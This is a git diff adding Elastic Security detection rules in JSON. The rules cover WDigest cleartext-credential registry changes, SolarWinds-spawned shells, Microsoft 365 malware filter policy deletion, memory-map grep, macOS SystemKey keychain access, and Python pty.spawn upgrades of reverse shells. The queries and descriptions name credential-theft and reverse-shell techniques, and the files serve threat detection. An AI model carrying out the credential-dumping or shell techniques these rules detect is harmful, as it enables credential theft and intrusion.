credential dumping tools.\n\n#### Possible investigation steps\n\n- It is unlikely that the monitored registry key was modified legitimately in newer versions of Windows. Analysts should treat any activity triggered from this rule with high priority as it typically represents an active adversary.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if credential dumping tools were run on the host, and retrieve and analyze suspicious executables:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team, as these modifications expose the entire domain to credential compromises and consequently unauthorized access.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\SecurityProviders\\\\WDigest\\\\UseLogonCredential\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\SecurityProviders\\\\WDigest\\\\UseLogonCredential\"\n ) and registry.data.strings : (\"1\", \"0x00000001\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\" and user.id : \"S-1-5-18\")\n", + "references": [ + "https://www.csoonline.com/article/3438824/how-to-detect-and-halt-credential-theft-via-windows-wdigest.html", + "https://www.praetorian.com/blog/mitigating-mimikatz-wdigest-cleartext-credential-theft?edition=2019", + "https://frsecure.com/compromised-credentials-response-playbook", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_110.json b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_110.json new file mode 100644 index 00000000000..b4e430e27fc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_110.json @@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious SolarWinds child process (Cmd.exe or Powershell.exe) was detected.", + "false_positives": [ + "Trusted SolarWinds child processes. Verify process details such as network connections and file writes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Command Execution via SolarWinds Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name: (\"cmd.exe\", \"powershell.exe\") and\nprocess.parent.name: (\n \"ConfigurationWizard*.exe\",\n \"NetflowDatabaseMaintenance*.exe\",\n \"NetFlowService*.exe\",\n \"SolarWinds.Administration*.exe\",\n \"SolarWinds.Collector.Service*.exe\",\n \"SolarwindsDiagnostics*.exe\"\n )\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://github.com/mandiant/sunburst_countermeasures/blob/main/rules/SUNBURST/hxioc/SUNBURST%20SUSPICIOUS%20FILEWRITES%20(METHODOLOGY).ioc" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_111.json b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_111.json new file mode 100644 index 00000000000..3cf8bf00efb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_111.json @@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious SolarWinds child process (Cmd.exe or Powershell.exe) was detected.", + "false_positives": [ + "Trusted SolarWinds child processes. Verify process details such as network connections and file writes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Command Execution via SolarWinds Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name: (\"cmd.exe\", \"powershell.exe\") and\nprocess.parent.name: (\n \"ConfigurationWizard*.exe\",\n \"NetflowDatabaseMaintenance*.exe\",\n \"NetFlowService*.exe\",\n \"SolarWinds.Administration*.exe\",\n \"SolarWinds.Collector.Service*.exe\",\n \"SolarwindsDiagnostics*.exe\"\n )\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://github.com/mandiant/sunburst_countermeasures/blob/main/rules/SUNBURST/hxioc/SUNBURST%20SUSPICIOUS%20FILEWRITES%20(METHODOLOGY).ioc" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_103.json b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_103.json new file mode 100644 index 00000000000..48515d9b128 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_103.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection.", + "false_positives": [ + "A malware filter policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Malware Filter Policy Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-MalwareFilterPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterpolicy?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_105.json b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_105.json new file mode 100644 index 00000000000..218b94351eb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_105.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection.", + "false_positives": [ + "A malware filter policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Malware Filter Policy Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-MalwareFilterPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterpolicy?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_206.json b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_206.json new file mode 100644 index 00000000000..16afdd6dbc0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_206.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection.", + "false_positives": [ + "A malware filter policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Malware Filter Policy Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-MalwareFilterPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterpolicy?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d74d6506-427a-4790-b170-0c2a6ddac799_1.json b/packages/security_detection_engine/kibana/security_rule/d74d6506-427a-4790-b170-0c2a6ddac799_1.json new file mode 100644 index 00000000000..f40fd3205a5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d74d6506-427a-4790-b170-0c2a6ddac799_1.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Monitors for grep activity related to memory mapping. The /proc/*/maps file in Linux provides a memory map for a specific process, detailing the memory segments, permissions, and what files are mapped to these segments. Attackers may read a process's memory map to identify memory addresses for code injection or process hijacking.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Memory grep Activity", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and\nprocess.name in (\"grep\", \"egrep\", \"fgrep\", \"rgrep\") and process.args in (\"[stack]\", \"[vdso]\", \"[heap]\")\n", + "references": [ + "https://github.com/arget13/DDexec" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d74d6506-427a-4790-b170-0c2a6ddac799", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "d74d6506-427a-4790-b170-0c2a6ddac799_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d74d6506-427a-4790-b170-0c2a6ddac799_2.json b/packages/security_detection_engine/kibana/security_rule/d74d6506-427a-4790-b170-0c2a6ddac799_2.json new file mode 100644 index 00000000000..d0400f423a4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d74d6506-427a-4790-b170-0c2a6ddac799_2.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Monitors for grep activity related to memory mapping. The /proc/*/maps file in Linux provides a memory map for a specific process, detailing the memory segments, permissions, and what files are mapped to these segments. Attackers may read a process's memory map to identify memory addresses for code injection or process hijacking.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Memory grep Activity", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name in (\"grep\", \"egrep\", \"fgrep\", \"rgrep\") and process.args in (\"[stack]\", \"[vdso]\", \"[heap]\")\n", + "references": [ + "https://github.com/arget13/DDexec" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d74d6506-427a-4790-b170-0c2a6ddac799", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "d74d6506-427a-4790-b170-0c2a6ddac799_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_106.json b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_106.json new file mode 100644 index 00000000000..fa79c5e87ef --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_106.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features, including Wi-Fi and website passwords, secure notes, certificates, and Kerberos. Adversaries may collect the keychain storage data from a system to acquire credentials.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "SystemKey Access via Command Line", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.args:(\"/private/var/db/SystemKey\" or \"/var/db/SystemKey\")\n", + "references": [ + "https://github.com/AlessandroZ/LaZagne/blob/master/Mac/lazagne/softwares/system/chainbreaker.py" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d75991f2-b989-419d-b797-ac1e54ec2d61", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.001", + "name": "Keychain", + "reference": "https://attack.mitre.org/techniques/T1555/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "d75991f2-b989-419d-b797-ac1e54ec2d61_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_110.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_110.json new file mode 100644 index 00000000000..2d79c5bd90d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_110.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Interactive Terminal Spawned via Python", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.parent.args_count >= 3 and process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.args : \"*sh\" and process.args_count == 1 and process.parent.args_count == 1)\n)\n", 